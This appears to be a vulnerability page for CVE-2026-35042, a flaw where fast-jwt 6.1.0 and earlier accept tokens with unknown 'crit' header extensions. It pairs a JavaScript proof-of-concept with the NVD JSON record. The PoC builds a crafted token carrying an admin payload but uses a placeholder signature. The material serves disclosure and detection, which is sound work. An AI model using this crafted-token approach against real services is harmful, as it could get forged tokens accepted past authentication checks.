CVE-2026-35042

// PoC for CVE-2026-35042: fast-jwt 'crit' header validation bypass // This script demonstrates that a token with an unknown critical extension is accepted. const fastjwt = require('fast-jwt'); const secret = 'secret-key'; // 1. Create a verifier instance (Vulnerable version <= 6.1.0) const verifier = fastjwt.createVerifier({ key: secret }); // 2. Construct a malicious token header with 'crit' pointing to an unknown parameter // Header: { "alg": "HS256", "crit": ["http://example.com/unknown_extension"] } // Note: In a real attack, the attacker must sign this header with a valid key known to the server. // This PoC assumes the attacker can generate a valid signature for the crafted header. // Example of a crafted token structure (Base64URL encoded) // Header part: eyJhbGciOiJIUzI1NiIsImNyaXQiOlsiaHR0cDovL2V4YW1wbGUuY29tL3Vua25vd25fZXh0ZW5zaW9uIl19 // Payload part: eyJ1c2VyIjoiYWRtaW4ifQ // Signature: [Valid HMAC-SHA256 of header.payload] // For demonstration, we simulate the verification logic bypass: const maliciousToken = 'eyJhbGciOiJIUzI1NiIsImNyaXQiOlsiaHR0cDovL2V4YW1wbGUuY29tL3Vua25vd25fZXh0ZW5zaW9uIl19.eyJ1c2VyIjoiYWRtaW4ifQ.' + 'signature_valid_for_this_structure'; // Attacker needs to compute this try { // In a vulnerable environment, if the signature is valid, this passes. // It SHOULD throw an error because the 'crit' parameter is unknown. const decoded = verifier(maliciousToken); console.log("[!] Vulnerability Detected: Token accepted despite unknown crit header."); } catch (error) { console.log("[+] Secure: Token rejected as expected."); }

{"cve": {"id": "CVE-2026-35042", "sourceIdentifier": "[email protected]", "published": "2026-04-06T17:17:13.410", "lastModified": "2026-04-10T18:35:35.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-jwt provides fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, fast-jwt does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that fast-jwt does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-636"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nearform:fast-jwt:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.2.0", "matchCriteriaId": "FD2BA255-333A-4CF2-9B8E-C685DF7A11A9"}]}]}], "references": [{"url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-hm7r-c7qw-ghp6", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-hm7r-c7qw-ghp6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}